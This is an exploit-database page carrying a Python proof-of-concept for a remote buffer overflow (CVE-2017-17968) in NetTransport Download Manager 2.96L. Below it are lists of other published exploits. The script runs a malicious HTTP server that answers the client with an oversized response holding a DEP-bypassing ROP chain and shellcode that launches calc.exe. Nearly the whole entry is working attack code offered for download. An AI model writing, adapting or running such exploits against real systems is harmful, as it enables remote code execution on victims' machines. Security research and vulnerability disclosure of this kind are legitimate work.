Menu

Search for hundreds of thousands of exploits

"NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)"

Author

Exploit author

"Aloyce J. Makalanga"

Platform

Exploit platform

windows

Release date

Exploit published date

2017-12-29

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#!/usr/bin/pythion

# Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass)
# CVE: CVE-2017-17968
# Date: 28-12-2017
# Software Link: http://xi-soft.com/downloads/NXSetup_x86.zip
# Exploit Author: Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://xi-soft.com/default.htm
# Category: webapps
# Impact: Code execution
 
#1. Description
#   
#A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution
#   
#2. Proof of Concept
 #

#!/usr/bin/pythion




def main():
    host = "192.168.205.131"
    port = 80

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, port))
    s.listen(1)
    print "\n[+] Listening on %d ..." % port

    cl, addr = s.accept()
    print "[+] Connection accepted from %s" % addr[0]

    #Disabling DEP by VirtualProtect()
    def create_rop_chain():
        # rop chain generated with mona.py - www.corelan.be
        rop_gadgets = [
            0x10001653,  # POP EAX # RETN [libssl.dll]
            0x00485ed3,# MOV EAX,DWORD PTR DS:[ECX] # POP EDI # POP ESI # POP EBP # POP ECX # RETN 0x04 [NetTransport.exe]
            0x41414141,  # Filler (compensate)
            0x41414141,  # Filler (compensate)
            0x41414141,  # Filler (compensate)
            0x41414141,  # Filler (compensate)
            0x00496596,  # XCHG EAX,ESI # RETN 0x0A [NetTransport.exe]
            0x41414141,  # Filler (RETN offset compensation)
            0x004ea919,  # POP EBP # RETN [NetTransport.exe]
            0x41414141,  # Filler (RETN offset compensation)
            0x41414141,  # Filler (RETN offset compensation)
            0x4141,  # Filler (RETN offset compensation)
            0x004608df,  # & push esp # ret  [NetTransport.exe]
            0x0045e75f,  # POP EBX # RETN [NetTransport.exe]
            0x00000201,  # 0x00000201-> ebx
            0x00554dbc,  # POP ECX # RETN [NetTransport.exe]
            0x00000040,  # 0x00000040-> edx
            0x00499c92,  # XOR EDX,EDX # RETN 0x04 [NetTransport.exe]
            0x0041254c,  # ADC EDX,ECX # POP EBX # ADD ESP,0C # RETN 0x04 [NetTransport.exe]
            0x41414141,  # Filler (RETN offset compensation)
            0x41414141,  # Filler (compensate)
            0x41414141,  # Filler (compensate)
            0x41414141,  # Filler (compensate)
            0x41414141,  # Filler (compensate)
            0x0054e559,  # POP ECX # RETN [NetTransport.exe]
            0x41414141,  # Filler (RETN offset compensation)
            0x10004b93,  # &Writable location [libssl.dll]
            0x0050343f,  # POP EDI # RETN [NetTransport.exe]
            0x00487073,  # RETN (ROP NOP) [NetTransport.exe]
            0x10001653,  # POP EAX # RETN [libssl.dll]
            0x90909090,  # nop
            0x00486f78,  # PUSHAD # RETN [NetTransport.exe]
        ]
        return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

    rop_chain = create_rop_chain()

    #Tiny calc.exe shellcode

    shellcode = (
            "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
            "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
            "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
            "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
            "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
            "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
            "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
            "\x1c\x39\xbd"
    )

    MaxSize = 60000
    EAX_overwrite= "A"*16739 #Always trigger a crash at EAX

    #EIP 004E7828
    #evil = "\x28\x78\x4E\x90"

    rop = rop_chain
    nops = "\x90"*10
    pads = "C"*(MaxSize - len(EAX_overwrite + rop + nops + shellcode))
    payload = EAX_overwrite + rop + nops + shellcode + pads

    buffer = "HTTP/1.1 200 " + payload + "\r\n"

    print cl.recv(1000)
    cl.send(buffer)
    print "[+] Sending buffer: OK\n"


    cl.close()
    s.close()

if __name__ == '__main__':
    import struct
    import socket
    main()


   
#3. Solution:
#   
#No solution available at the moment.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2017-12-29 "NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)" remote windows "Aloyce J. Makalanga"
2017-12-27 "ALLMediaServer 0.95 - Buffer Overflow (PoC)" dos windows "Aloyce J. Makalanga"
2017-12-26 "GetGo Download Manager 5.3.0.2712 - Buffer Overflow" dos windows "Aloyce J. Makalanga"
2017-12-20 "Ability Mail Server 3.3.2 - Cross-Site Scripting" webapps multiple "Aloyce J. Makalanga" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected